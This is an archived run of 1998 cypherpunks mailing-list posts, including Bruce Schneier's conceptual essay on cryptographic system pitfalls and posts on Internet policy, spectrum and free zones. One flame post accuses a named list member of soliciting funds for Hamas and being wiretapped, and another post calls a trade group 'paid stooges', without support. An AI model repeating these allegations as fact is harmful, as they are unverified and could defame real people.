Message-ID: <34B3DFB4.6396@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain

Wednesday 1/7/98 12:57 PM

Bruce Schneier wrote 

    and a burglar willing to try all 10,000 is guaranteed to break 
    into your house.

This is posted at jya.com.

Sandia employees Jack Hudson and Jack Menako, both in my division
when Sandia transferred me to break electronic locks for the FBI/ERF
[Engineering Research Facility, Quantico, VA], were TRYING to 
defeat combination locks on file cabinets.

Menako built a frame to connect a stepper-motor to the combination
dial.

The stepper motor was wried to a PC.

Hudson wrote the software to try all possible combinations.

What happened, IN FACT, was that the combination lock wore-out
before the combination which opened the lock was reached.

Combinations locks are NOT ENGINEERED for such heavy use.

The file safe had to be destroyed to open it!

So Schneier's statement may be incorrect.  No guarantee.

Guys, this is the REAL WORLD.

bill

Title: Security Pitfalls in Cryptography









Security Pitfalls in Cryptography

by Bruce Schneier
Cryptography Consultant
Counterpane Systems
e-mail: schneier@counterpane.com

Magazine articles like to describe cryptography products in terms of algorithms and key length. Algorithms make good sound bites: they can be explained in a few words and they're easy to compare with one another. "128-bit keys mean good security." "Triple-DES means good security." "40-bit keys mean weak security." "2048-bit RSA is better than 1024-bit RSA." 
But reality isn't that simple.  Longer keys don't always mean more security. Compare the cryptographic algorithm to the lock on your front door. Most door locks have four metal pins, each of which can be in one of ten positions. A key sets the pins in a particular configuration. If the key aligns them all correctly, then the lock opens. So there are only 10,000 possible keys, and a burglar willing to try all 10,000 is guaranteed to break into your house. But an improved lock with ten pins, making 10 billion possible keys, probably won't make your house more secure. Burglars don't try every possible key (a brute-force attack); most aren't even clever enough to pick the lock (a cryptographic attack against the algorithm). They smash windows, kick in doors, disguise themselves as policemen, or rob keyholders at gunpoint. One ring of art thieves in California defeated home security systems by taking a chainsaw to the house walls. Better locks don't help against these attacks.
Strong cryptography is very powerful when it is done right, but it is not a panacea. Focusing on the cryptographic algorithms while ignoring other aspects of security is like defending your house not by building a fence around it, but by putting an immense stake into the ground and hoping that the adversary runs right into it. Smart attackers will just go around the algorithms.
Counterpane Systems has spent years designing, analyzing, and breaking cryptographic systems. While we do research on published algorithms and protocols, most of our work examines actual products. We've designed and analyzed systems that protect privacy, ensure confidentiality, provide fairness, and facilitate commerce. We've worked with software, stand-alone hardware, and everything in between. We've broken our share of algorithms, but we can almost always find attacks that bypass the algorithms altogether. We don't have to try every possible key, or even find flaws in the algorithms. We exploit errors in design, errors in implementation, and errors in installation. Sometimes we invent a new trick to break a system, but most of the time we exploit the same old mistakes that designers make over and over again.
Attacks Against Cryptographic Designs
A cryptographic system can only be as strong as the encryption algorithms, digital signature algorithms, one-way hash functions, and message authentication codes it relies on. Break any of them, and you've broken the system. And just as it's possible to build a weak structure using strong materials, it's possible to build a weak cryptographic system using strong algorithms and protocols.
We often find systems that "void the warranty" of their cryptography by not using it properly: failing to check the size of values, reusing random parameters that should never be reused, and so on. Encryption algorithms don't necessarily provide data integrity. Key exchange protocols don't necessarily ensure that both parties receive the same key. In a recent research project, we found that some--not all--systems using related cryptographic keys could be broken, even though each individual key was secure. Security is a lot more than plugging in an algorithm and expecting the system to work. Even good engineers, well-known companies, and lots of effort are no guarantee of robust implementation; our work on the U.S. digital cellular encryption algorithm illustrated that.
Random-number generators are another place where cryptographic systems often break. Good random-number generators are hard to design, because their security often depends on the particulars of the hardware and software. Many products we examine use bad ones. The cryptography may be strong, but if the random-number generator produces weak keys, the system is much easier to break. Other products use secure random-number generators, but they don't use enough randomness to make the cryptography secure.
Recently Counterpane Systems has published new classes of attacks against random-number generators, based on our work with commercial designs. One of the most surprising things we've found is that specific random-number generators may be secure for one purpose but insecure for another; generalizing security analyses is dangerous.
In another research result, we looked at interactions between individually secure cryptographic protocols. Given a secure protocol, we show how to build another secure protocol that will break the first if both are used with the same keys on the same device.
Attacks Against Implementations
Many systems fail because of mistakes in implementation. Some systems don't ensure that plaintext is destroyed after it's encrypted. Other systems use temporary files to protect against data loss during a system crash, or virtual memory to increase the available memory; these features can accidentally leave plaintext lying around on the hard drive. In extreme cases, the operating system can leave the keys on the hard drive. One product we've seen used a special window for password input. The password remained in the window's memory even after it was closed. It didn't matter how good that product's cryptography was; it was broken by the user interface. 
Other systems fall to more subtle problems. Sometimes the same data is encrypted with two different keys, one strong and one weak. Other systems use master keys and then one-time session keys. We've broken systems using partial information about the different keys. We've also seen systems that use inadequate protection mechanisms for the master keys, mistakenly relying on the security of the session keys. It's vital to secure all possible ways to learn a key, not just the most obvious ones.
Electronic commerce systems often make implementation trade-offs to enhance usability. We've found subtle vulnerabilities here, when designers don't think through the security implications of their trade-offs. Doing account reconciliation only once per day might be easier, but what kind of damage can an attacker do in a few hours? Can audit mechanisms be flooded to hide the identity of an attacker? Some systems record compromised keys on "hotlists"; attacks against these hotlists can be very fruitful. Other systems can be broken through replay attacks: reusing old messages, or parts of old messages, to fool various parties.
Systems that allow old keys to be recovered in an emergency provide another area to attack. Good cryptographic systems are designed so that the keys exist for as short a period of time as possible; key recovery often negates any security benefit by forcing keys to exist long after they are useful. Furthermore, key recovery databases become sources of vulnerability in themselves, and have to be designed and implemented securely. In one product we evaluated, flaws in the key recovery database allowed criminals to commit fraud and then frame legitimate users.
Attacks Against Passwords
Many systems break because they rely on user-generated passwords. Left to themselves, people don't choose strong passwords. If they're forced to use strong passwords, they can't remember them. If the password becomes a key, it's usually much easier--and faster--to guess the password than it is to brute-force the key; we've seen elaborate security systems fail in this way. Some user interfaces make the problem even worse: limiting the passwords to eight characters, converting everything to lower case, etc. Even passphrases can be weak: searching through 40-character phrases is often much easier than searching through 64-bit random keys. We've also seen key-recovery systems that circumvent strong session keys by using weak passwords for key-recovery.
Attacks Against Hardware
Some systems, particularly commerce systems, rely on tamper-resistant hardware for security: smart cards, electronic wallets, dongles, etc. These systems may assume public terminals never fall into the wrong hands, or that those "wrong hands" lack the expertise and equipment to attack the hardware. While hardware security is an important component in many secure systems, we distrust systems whose security rests solely on assumptions about tamper resistance. We've rarely seen tamper resistance techniques that work, and tools for defeating tamper resistance are getting better all the time. When we design systems that use tamper resistance, we always build in complementary security mechanisms just in case the tamper resistance fails.
The "timing attack" made a big press splash in 1995: RSA private keys could be recovered by measuring the relative times cryptographic operations took. The attack has been successfully implemented against smart cards and other security tokens, and against electronic commerce servers across the Internet. Counterpane Systems and others have generalized these methods to include attacks on a system by measuring power consumption, radiation emissions, and other "side channels," and have implemented them against a variety of public-key and symmetric algorithms in "secure" tokens. We've yet to find a smart card that we can't pull the secret keys out of by looking at side channels. Related research has looked at fault analysis: deliberately introducing faults into cryptographic processors in order to determine the secret keys. The effects of this attack can be devastating.
Attacks Against Trust Models
Many of our more interesting attacks are against the underlying trust model of the system: who or what in the system is trusted, in what way, and to what extent. Simple systems, like hard-drive encryption programs or telephone privacy products, have simple trust models. Complex systems, like electronic commerce systems or multi-user e-mail security programs, have complex (and subtle) trust models. An e-mail program might use uncrackable cryptography for the messages, but unless the keys are certified by a trusted source (and unless that certification can be verified), the system is still vulnerable. Some commerce systems can be broken by a merchant and a customer colluding, or by two different customers colluding. Other systems make implicit assumptions about security infrastructures, but don't bother to check that those assumptions are actually true. If the trust model isn't documented, then an engineer can unknowingly change it in product development, and compromise security.
Many software systems make poor trust assumptions about the computers they run on; they assume the desktop is secure. These programs can often be broken by Trojan horse software that sniffs passwords, reads plaintext, or otherwise circumvents security measures. Systems working across computer networks have to worry about security flaws resulting from the network protocols. Computers that are attached to the Internet can also be vulnerable. Again, the cryptography may be irrelevant if it can be circumvented through network insecurity. And no software is secure against reverse-engineering.
Often, a system will be designed with one trust model in mind, and implemented with another. Decisions made in the design process might be completely ignored when it comes time to sell it to customers. A system that is secure when the operators are trusted and the computers are completely under the control of the company using the system may not be secure when the operators are temps hired at just over minimum wage and the computers are untrusted. Good trust models work even if some of the trust assumptions turn out to be wrong.
Attacks on the Users
Even when a system is secure if used properly, its users can subvert its security by accident--especially if the system isn't designed very well. The classic example of this is the user who gives his password to his co-workers so they can fix some problem when he's out of the office. Users may not report missing smart cards for a few days, in case they are just misplaced. They may not carefully check the name on a digital certificate. They may reuse their secure passwords on other, insecure systems. They may not change their software's default weak security settings. Good system design can't fix all these social problems, but it can help avoid many of them.
Attacks Against Failure Recovery
Strong systems are designed to keep small security breaks from becoming big ones. Recovering the key to one file should not allow the attacker to read every file on the hard drive. A hacker who reverse-engineers a smart card should only learn the secrets in that smart card, not information that will help him break other smart cards in the system. In a multi-user system, knowing one person's secrets shouldn't compromise everyone else's.
Many systems have a "default to insecure mode." If the security feature doesn't work, most people just turn it off and finish their business. If the on-line credit card verification system is down, merchants will default to the less-secure paper system. Similarly, it is sometimes possible to mount a "version rollback attack" against a system after it has been revised to fix a security problem: the need for backwards compatibility allows an attacker to force the protocol into an older, insecure, version.
Other systems have no ability to recover from disaster. If the security breaks, there's no way to fix it. For electronic commerce systems, which could have millions of users, this can be particularly damaging. Such systems should plan to respond to attacks, and to upgrade security without having to shut the system down. The phrase "and then the company is screwed" is never something you want to put in your business plan. Good system design considers what will happen when an attack occurs, and works out ways to contain the damage and recover from the attack.
Attacks Against the Cryptography
Sometimes, products even get the cryptography wrong. Some rely on proprietary encryption algorithms. Invariably, these are very weak. Counterpane Systems has had considerable success breaking published encryption algorithms; our track record against proprietary ones is even better. Keeping the algorithm secret isn't much of an impediment to analysis, anyway--it only takes a couple of days to reverse-engineer the cryptographic algorithm from executable code. One system we analyzed, the S/MIME 2 electronic-mail standard, took a relatively strong design and implemented it with a weak cryptographic algorithm. The system for DVD encryption took a weak algorithm and made it weaker.
We've seen many other cryptographic mistakes: implementations that repeat "unique" random values, digital signature algorithms that don't properly verify parameters, hash functions altered to defeat the very properties they're being used for. We've seen cryptographic protocols used in ways that were not intended by the protocols' designers, and protocols "optimized" in seemingly trivial ways that completely break their security.
Attack Prevention vs. Attack Detection
Most cryptographic systems rely on prevention as their sole means of defense: the cryptography keeps people from cheating, lying, abusing, or whatever. Defense should never be that narrow. A strong system also tries to detect abuse and to contain the effects of any attack. One of our fundamental design principles is that sooner or later, every system will be successfully attacked, probably in a completely unexpected way and with unexpected consequences. It is important to be able to detect such an attack, and then to contain the attack to ensure it does minimal damage.
More importantly, once the attack is detected, the system needs to recover: generate and promulgate a new key pair, update the protocol and invalidate the old one, remove an untrusted node from the system, etc. Unfortunately, many systems don't collect enough data to provide an audit trail, or fail to protect the data against modification. Counterpane Systems has done considerable work in securing audit logs in electronic commerce systems, mostly in response to system designs that could fail completely in the event of a successful attack. These systems have to do more than detect an attack: they must also be able to produce evidence that can convince a judge and jury of guilt.
Building Secure Cryptographic Systems
Security designers occupy what Prussian general Carl von Clausewitz calls "the position of the interior." A good security product must defend against every possible attack, even attacks that haven't been invented yet. Attackers, on the other hand, only need to find one security flaw in order to defeat the system. And they can cheat. They can collude, conspire, and wait for technology to give them additional tools. They can attack the system in ways the system designer never thought of.
Building a secure cryptographic system is easy to do badly, and very difficult to do well. Unfortunately, most people can't tell the difference. In other areas of computer science, functionality serves to differentiate the good from the bad: a good compression algorithm will work better than a bad one; a bad compression program will look worse in feature-comparison charts. Cryptography is different. Just because an encryption program works doesn't mean it is secure. What happens with most products is that someone reads Applied Cryptography, chooses an algorithm and protocol, tests it to make sure it works, and thinks he's done. He's not. Functionality does not equal quality, and no amount of beta testing will ever reveal a security flaw. Too many products are merely "buzzword compliant"; they use secure cryptography, but they are not secure.

Home
page - <a
href="http://www.counterpane.com/cpaneinfo.html">Counterpane<font
size="2"> - <font
size="2">Applied Cryptography<font
size="2"> - <font
size="2">E-Mail Security
- Crypto Links<font
size="2">
Bruce
Schneier Bio - <a
href="http://www.counterpane.com/blowfish.html">Blowfish<font
size="2"> - <font
size="2">Publications
- <font
size="2">Contact Counterpane



Bruce Schneier
Copyright 1998 Counterpane Systems.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@vorlon.mit.edu>
Date: Thu, 8 Jan 1998 03:14:49 +0800
To: cypherpunks@cyberpass.net
Subject: More on Association for Interactive Media conference
Message-ID: <Pine.LNX.3.95.980107140820.21602C-100000@vorlon.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



[This is the conference Tim was criticizing yesterday. --Declan]

---------- Forwarded message ----------
Date: Wed, 7 Jan 1998 10:49:01 -0800 (PST)
From: Declan McCullagh <declan@well.com>
To: politech@vorlon.mit.edu
Subject: FC: More on Association for Interactive Media conference

Netly articles on AIM:
  http://cgi.pathfinder.com/netly/editorial/0,1012,1155,00.html
  http://cgi.pathfinder.com/netly/editorial/0,1012,1464,00.html

-Declan

---------- Forwarded message ----------
Date: Wed, 07 Jan 1998 10:24:20 -0800
From: John Gilmore <gnu@toad.com>
To: declan@well.com, gnu@toad.com
Subject: Re: FC: Association for Interactive Media conference (DC, 2/98) 

[for forwarding if you like]

Note that AIM, the sponsors of the "WashingtonWeb" conference, are the
folks who appear to be paid stooges for Network Solutions in trying to
keep their ten million dollar per month monopoly on domain names.
AIM's coverage of that issue has been completely false and completely
biased ("The Internet is likely to break apart on October 15, 1997";
"you may lose all rights to use your trademark in your Internet
address forever".  See www.interactivehq.org/oic/).

They've been deliberately making false statements to stir up sentiment
against the evolution of domain names away from the Network Solutions
monopoly.

I wouldn't promote or attend their conference.  There's something going
on there that I don't understand -- but I do recognize slime when I see it.

	John Gilmore



--------------------------------------------------------------------------
POLITECH -- the moderated mailing list of politics and technology
To subscribe: send a message to majordomo@vorlon.mit.edu with this text:
subscribe politech
More information is at http://www.well.com/~declan/politech/
--------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Miller <dm0@avana.net>
Date: Thu, 8 Jan 1998 03:29:04 +0800
To: cypherpunks@Algebra.COM
Subject: FCC squeezes the ham TV band
Message-ID: <34B40059.28DE@avana.net>
MIME-Version: 1.0
Content-Type: text/plain



Wednesday January 7 10:22 AM EST

FCC Reallocates Lightly Used Television Spectrum

WASHINGTON (Reuters) - The Federal Communications Commission said
Tuesday it had reallocated lightly used television frequencies for use
by public safety services.

Portions of the spectrum between 746 and 806 megahertz that had carried
channels 60 to 69 will be given over to police and fire departments and
other emergency services. The remainder of the spectrum will be
auctioned off for commercial use.

The reallocation was required by the Balanced Budget Act of 1997. The
FCC had previously announced it would reallocate the lightly used
spectrum in an April, 1997 plan for the transition to digital
television.

FCC chairman William Kennard said on Tuesday the commission would allow
some users of the high channels to continue operations, however.

"While recovery of unused spectrum is an integral part of the FCC plan
for transition from analog to digital television, I am sensitive to the
effects of spectrum recovery on Low Power TV and TV translators,"
Kennard said in a statement.

Such broadcasters may continue operations through the transition to
digital television "as long as they do not cause harmful interference
to primary services," he said.

-----------------------------------------------------------------------

Copyright (c) 1997 Reuters Limited. All rights reserved. Republication or
redistribution of Reuters content is expressly prohibited without the
prior written consent of Reuters. Reuters shall not be liable for any
errors or delays in the content, or for any actions taken in reliance
thereon





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Thu, 8 Jan 1998 04:03:53 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Polycratic government?...
Message-ID: <199801072025.OAA32052@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi,

Is anyone aware of research or writings regarding polycratic political
systems?

Thanks.


    ____________________________________________________________________
   |                                                                    |
   |      Those who make peaceful revolution impossible will make       |
   |      violent revolution inevitable.                                |
   |                                                                    |
   |                                          John F. Kennedy           |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Miller <dm0@avana.net>
Date: Thu, 8 Jan 1998 03:54:59 +0800
To: declan@well.com
Subject: Re: More on Association for Interactive Media conference
In-Reply-To: <Pine.LNX.3.95.980107140820.21602C-100000@vorlon.mit.edu>
Message-ID: <34B406D5.2A9D@avana.net>
MIME-Version: 1.0
Content-Type: text/plain



Declan McCullagh wrote:
> ---------- Forwarded message ----------
> From: John Gilmore <gnu@toad.com>
> 
> Note that AIM, the sponsors of the "WashingtonWeb" conference, are the
> folks who appear to be paid stooges for Network Solutions in trying to
> keep their ten million dollar per month monopoly on domain names.
> AIM's coverage of that issue has been completely false and completely
> biased ("The Internet is likely to break apart on October 15, 1997";
> "you may lose all rights to use your trademark in your Internet
> address forever".  See www.interactivehq.org/oic/).

>From the January 5, 1998 issue of Internet Week, page 14:

 "Network Solutions, Inc., which registers domain names
  under an agreement with the National Science Foundation,
  will have the [DNS] agreement extended six months beyond
  its March 1998 conclusion to ensure the stability of the
  system."

--David Miller





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Thu, 8 Jan 1998 04:41:30 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Too many "Internet Conferences" in Washington (fwd)
Message-ID: <199801072105.PAA32344@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Wed, 7 Jan 1998 12:30:42 -0800 (PST)
> From: Declan McCullagh <declan@well.com>
> Subject: Re: Too many "Internet Conferences" in Washington

> Attendance at this conference will be by invitation only. About 35
> individuals will represent a
> variety of backgrounds and perspectives including the computing industry
> (such as Internet service
> providers, network administrators, and providers of "anonymizing"
> services) the legal community,
> professional societies, academic institutions, law enforcement agencies,
> and other agencies of
> government. 

This is the real fault with the conference mentality...

How can anyone reasonably expect 35 people, invitation only or not, to have
a clue about any aspect of the industry let alone some sort of birds eye
view?

I would wager that if we took the top 35 ISP's in the US they couldn't come
up with a cohesive expression of viewpoint that would have a lifetime
measured in anything more than a few weeks.

Pure hubris.


    ____________________________________________________________________
   |                                                                    |
   |      Those who make peaceful revolution impossible will make       |
   |      violent revolution inevitable.                                |
   |                                                                    |
   |                                          John F. Kennedy           |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Thu, 8 Jan 1998 05:25:12 +0800
To: cypherpunks@cyberpass.net
Subject: Governments want to change Net architecture, from Comm Daily
Message-ID: <v03007802b0d9a146334a@[168.161.105.216]>
MIME-Version: 1.0
Content-Type: text/plain




>Date: Wed, 7 Jan 1998 07:44:57 -0800 (PST)
>From: Declan McCullagh <declan@well.com>
>To: politech@vorlon.mit.edu
>Subject: FC: Governments want to change Net architecture, from Comm Daily
>MIME-Version: 1.0
>Sender: owner-politech@vorlon.mit.edu
>Reply-To: declan@well.com
>X-Loop: politech@vorlon.mit.edu
>X-URL: Politech is at http://www.well.com/~declan/politech/
>
>[Apologies to Art for not forwarding this earlier. --Declan]
>
>---------- Forwarded message ----------
>Date: Thu, 18 Dec 1997 10:28:49 -0500
>From: Art Brodsky <arb@well.com>
>To: declan@smtp.well.com
>Subject: comm daily story
>
>Declan,
> Here's the story from Comm Daily, Dec. 17
>
>'Optimistic and Damned Silly'
>
>     INTERNET CHANGE FOCUS OF INTERNATIONAL LAW ENFORCEMENT
>
>     Law enforcement officials of U.S. and 7 other industrialized
>countries want to make fundamental changes in Internet technology
>in order to aid in their ability to track and catch criminals,
>Justice Dept. sources said.
>
>     Program to consider changes in Internet architectures comes as
>part of agreement announced last week by Attorney Gen. Janet Reno
>and Justice ministers from around world after meeting in Washington
>(CD Dec 11 p10).  However, one leading Internet authority, MCI
>Senior Vp Vinton Cerf, said international group's plan wouldn't
>work.
>
>     Justice ministers are considering approach similar to that of
>Communications Assistance to Law Enforcement Act (CALEA) program in
>U.S., which would make traffic from advanced telecom networks more
>accessible to law enforcement entities.  Representatives of Canada,
>France, Germany, Italy, Japan, Russia and U.K., as well as U.S.,
>agreed as part of "statement of principles" issued in communique
>following 2-day session that:  "To the extent practicable,
>information and telecommunications systems should be designed to
>help prevent and detect network abuse, and should also facilitate
>the tracing of criminals and the collection of evidence."  Several
>items on "action plan" issued in support of those principles refer
>to working with new technologies to collect critical evidence,
>developing standards for authenticating electronic data for use in
>investigations and encouraging standards-making bodies to provide
>public and private sectors "with standards for reliable and secure
>telecommunications and data processing technologies."
>
>     DoJ officials said Dept. may want to talk later with telephone
>industry on trap and trace issues, but it's premature to involve
>them now in follow-up to international summit.  Instead, they said,
>they are looking at broader picture of telecom networks that
>haven't worked as closely with law enforcement as they could, and
>have begun thinking about Internet protocols.  Internet operates
>globally with common protocols, currently Internet Protocol version
>4.  Internet engineers are working on next iteration, version IPv6
>(Internet Protocol version 6 -- 5 was experimental attempt that was
>dropped).  Justice official said that one problem now is that it's
>easy to send and receive e-mail with false address, called
>"spoofing."
>
>     It would be helpful to law enforcement if information sent
>over Internet were tagged, and packets would transmit information
>reliably as to where they came from, including user and service
>provider, officials said.  Loose analogy would be to compare e-mail
>messages to tagging of explosives, so law enforcement can track
>explosive material to its source.  DoJ said new protocols could be
>designed to make it easier to authenticate messages and to make
>system more reliable.  Law enforcement wants to work with industry
>to accomplish goal, saying it would help "keep people who are
>abusing information technologies from continuing to do it."
>
>     There will be substantial obstacles to law enforcement
>concept, however.  Not least of them is that IPv6 will include
>sophisticated encryption capabilities as part of protocols.  Such
>security isn't built in to Internet now, one of reasons why
>electronic commerce has yet to take off, said Mark McFadden,
>communications dir. for Commercial Internet eXchange Assn. (CIX).
>That feature will make it harder for law enforcement to gain access
>to information, he said.
>
>     Cerf, co-inventor of Internet protocols, said in interview
>that law enforcement's concept of tagging e-mail messages wouldn't
>work:  "To imagine that we would instantly create the
>infrastructure for that throughout the entire Internet strikes me
>as optimistic and damned silly, at least in the short term.  Anyone
>who anticipates using tools to guarantee that everything will be
>traceable is not going to have a successful outcome."  Technically,
>such project could be accomplished, Cerf said, but having
>administrative infrastructure to administer it is quite different
>issue.
>
>     It's possible to have digital signature for every packet of
>data, but it would take "an enormous amount of processing, and it's
>not clear we have any network computers and routers that could do
>that and maintain the traffic flow that's required," Cerf said.  It
>also would require that each sender affix digital signature to each
>piece of mail, idea that Cerf said couldn't be enforced:  "Frankly,
>the idea of trying to guarantee traceability of that kind is far
>from implementable."  He said he didn't want to be misunderstood
>that his objections were "an argument in favor of criminality."
>But Cerf said he worries that "someone relies on what they think is
>a technical solution without recognizing all of the administrative
>mechanics that need to be put in place."
>
>     Law enforcement has some time to work with Internet community.
>McFadden said IPv6 isn't scheduled to be implemented at consumer
>level for at least 5 years, possibly as much as 10.  There was some
>urgency when it appeared that reservoir of Internet addresses would
>dry up, but with progress being made to protect addresses as scarce
>resource there's less pressure for new set of protocols, he said.
>
>
>posted with permission Warren Publishing
>
>
>--------------------------------------------------------------------------
>POLITECH -- the moderated mailing list of politics and technology
>To subscribe: send a message to majordomo@vorlon.mit.edu with this text:
>subscribe politech
>More information is at http://www.well.com/~declan/politech/
>--------------------------------------------------------------------------
>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@otc.net>
Date: Thu, 8 Jan 1998 09:33:41 +0800
To: cypherpunks@toad.com
Subject: a good example of bad crypto hype
Message-ID: <3.0.5.32.19980107171614.007c4eb0@206.40.207.40>
MIME-Version: 1.0
Content-Type: text/plain



	
at http://www.meganet.com/explain.htm
you can test your critical thinking skills...



------------------------------------------------------------
      David Honig                   Orbit Technology
     honig@otc.net                  Intaanetto Jigyoubu

	"How do you know you are not being deceived?" 
	---A Compendium of Analytic TradeCraft Notes, 
	Directorate of Intelligence, CIA
















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Thu, 8 Jan 1998 08:11:05 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Ruby Ridge FBI sniper to stand trial [CNN]
Message-ID: <199801080032.SAA00252@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

>                  FBI SNIPER TO STAND TRIAL IN RUBY RIDGE CASE
>                                        
>      FBI seal January 7, 1998
>      Web posted at: 6:32 p.m. EST (2332 GMT)
>      
>      BONNERS FERRY, Idaho (AP) -- A judge Wednesday ordered an FBI
>      sharpshooter to stand trial on a state manslaughter charge for the
>      death of white separatist Randy Weaver's wife in the 1992 siege at
>      Ruby Ridge.
>      
>      The U.S. Justice Department decided in 1994 against prosecuting Lon
>      Horiuchi and upheld the decision last year after a long review. But
>      in August, Boundary County Prosecutor Denise Woodbury filed a charge
>      of involuntary manslaughter.
>      
>      Magistrate Judge Quentin Harden decided there was probable cause to
>      bring Horiuchi to trial on the state charge. Harden scheduled a
>      February 13 arraignment before state Judge James Michaud.
>      
>      A federal judge is to hear arguments Monday from Horiuchi's lawyers
>      in Boise that the case should be transferred to federal court.


    ____________________________________________________________________
   |                                                                    |
   |      Those who make peaceful revolution impossible will make       |
   |      violent revolution inevitable.                                |
   |                                                                    |
   |                                          John F. Kennedy           |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Information Security <guy@panix.com>
Date: Thu, 8 Jan 1998 08:23:11 +0800
To: cypherpunks@toad.com
Subject: Re: Sentencing for Electronic Copyright Infringement
Message-ID: <199801080008.TAA03811@panix2.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



   >   Subject: Re: Sentencing for Electronic Copyright Infringement
   >   From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
   >   Date: Wed, 07 Jan 98 08:09:32 EST
   >   
   >   Tim May <tcmay@got.net> writes:
   >   > When the ninja narc raiders cart our computers off for analysis, I'm sure
   >   > they can find enough violations to send us away for as many years as they
   >   > wish.
   >   
   >   And if Timmy knew a bit more about cryptography than he could learn by browsing
   >   through Bruce Schneier's book, the ninja narc raiders wouldm't be able to find
   >   shit on any of his media. :-)

Hey, Vulis, how does it feel to know all your phone lines
are being monitored by the FBI? For (among other things):
soliciting funds for terrorist groups incl Hamas to kill
a couple, and threatening government employees...
---guy

    Lon T. Horiuchi was indicted for murder today.
    The DOJ refused to prosecute him: the state will.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jalonz@openworld.com
Date: Thu, 8 Jan 1998 08:34:25 +0800
To: blancw@cnw.com>
Subject: Re: The Digital Society Group
Message-ID: <85256585.00837DB3.00@openworld.com>
MIME-Version: 1.0
Content-Type: text/plain




>>Without getting into too much detail, The Digital Society Group is
>>constructing a pure-technology infrastructure to provide for the
operation,
>>governance and existence of a complete digital society within a free
>>enterprise zone.
>The web site doesn't explain what methods you are using to establish these
>zones.   Do you have a mailing list set up for discussion?   The plan
>sounds interesting and ideologically supportable, but I'm skeptical.

Blanc,

I'm trying to get more docs online ASAP to explain things.

The physical free zones are very popular in the interational business
world, but I as a computer type had never heard of them other than Hong
Kong, etc.

When a country wants to set up a free zone, they come to Openworld and its
partner companies who do everything from clearing land, construction,
setting up businesses, schools, hospitals, etc. One of the soon to be
required components of a free zone installation is a digital infrastructure
to link all of the things together. We're talking smart cards for physical
structure security and personal ID, email, web hosting, net access, all
kinds of stuff.

Since we are building a "country" from scratch, rather than have to
automate paper workflows and do document management, the governance
processes are designed to be digital from the start.

Thus, to provide incorporation services to its citizens, a free zone allows
them to sign up via web browser, and the daily maintenance, processing and
management of the corporate records is also done almost exclusively via web
browser and email. Its fast, cheap, and requires far less labor than a
paper-based system. Another feature is that rather than maintaining the
records for the customer, the customer can log in via web browser and
update their own corporate record. (similar to Internic) This reduces labor
even further and reduces the cost of incorporation to around $100 per year
making instant offshore incorporation accessible to the general global
public for the first time.

That kind of solution applied across an entire governance and
communications infrastructure make for some radical things to become
possible.

Another concept being implemented is that each new free zone (being fully
wired) can easily replicate records and data with other free zones (they
will actually be required to for certain things) and thus a citizen in one
free zone can access banking, etc. services (even physical access) in
another. So, we see the emergence of a phsically distributed, digitally
cohesive network of "corporate states".

This lends to applications like data protection and hiding via distributed
storage or data sharing via common dataspaces and replication.

The technical methods to perform all of this work are a bit touchy. At the
risk of starting endless flame wars, I was looking at Lotus Bloats for its
replication and hierarchical security structure as well as easy forms to
web publishing and workflow management. That got shot down at the thought
of actually administrating the mess and also the costs are fairly
significant. The final nail in the coffin was the encryption key escrow
fiasco with the Swiss.

I was also looking at NT due to the nice database-to-web interface and the
fact that IIS 4 isn't too bad. But again software license costs are large
and who knows if Microsoft is doing, or will do, a key escrow deal for
future products? Who knows what they are doing now with NT on the OS level?

You can't run around making structures which allow people around the world
to move money and communicate anonymously, incorporate and have software
agents be owners of property and bank accounts without someone getting very
pissed off.

Thus, a good solution seems to be Linux in that its cheap, Unix is good for
multi-process routing, and the toolkits and components created by the
Digital Society can be easily moved into the public domin in some form or
another. Also, the export mess can be gotten around in one way or another.

Any comments? Any better alternatives than Linux?

The coding being done now is either cross-platform or prototype which will
be scrapped as soon as the kinks are worked out and the real fun can begin.

